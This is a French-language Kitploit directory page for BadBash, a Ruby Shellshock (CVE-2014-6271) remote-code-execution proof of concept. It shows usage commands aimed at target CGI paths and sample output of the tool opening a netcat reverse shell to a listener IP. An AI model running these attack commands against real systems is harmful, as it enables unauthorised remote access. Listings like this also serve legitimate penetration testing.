Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
BadBash — CVE-2014-6271 (ShellShock) RCE PoC outil | Kitploit
Outils/GitHubGitHub/securusglobal/badbash
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubsecurusglobal/badbash

BadBash

CVE-2014-6271 (ShellShock) RCE PoC outil

Voir le dépôt
411il y a 11 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

BadBash

CVE-2014-6271 (ShellShock) outil RCE PoC

======= BadBash est un outil d'exploitation RCE pour CVE-2014-6271. La version de base ne vérifie que le site HTTP CGI et ne fournit qu'un reverse shell netcat sur le port 1234.

Développeur : Andy Yang Version : 0.1.0 Licence : GPLv3

Projet GitHub original : https://github.com/RainMak3r/Rainstorm

================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h

BadBash - outil RCE CVE-2014-6271 par Andy Yang La version de base ne vérifie que les sites HTTP La version de base ne fournit qu'un reverse shell netcat sur le port 1234

EXEMPLE D'UTILISATION :

root@kitploit:~
 ./BBash.rb  -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
 ./BBash.rb  -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path            Chemin complet de la page CGI
-d, --Destination IP             Votre adresse IP qui écoute une connexion entrante
-h, --help                       Afficher l'aide

================================================================================================ Exemple d'utilisation.

RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'

[Info] Vérification si la cible est vulnérable........

[Info] Cela peut prendre jusqu'à 10 secondes........

[Info] La cible est vulnérable!!!

[Info] Veuillez utiliser NC pour écouter sur le port 1234 pour le reverse shell..........

[Info] Exploitation pour un reverse shell pour se connecter à 172.16.189.1:1234 via netcat ..........

Télécharger l’outil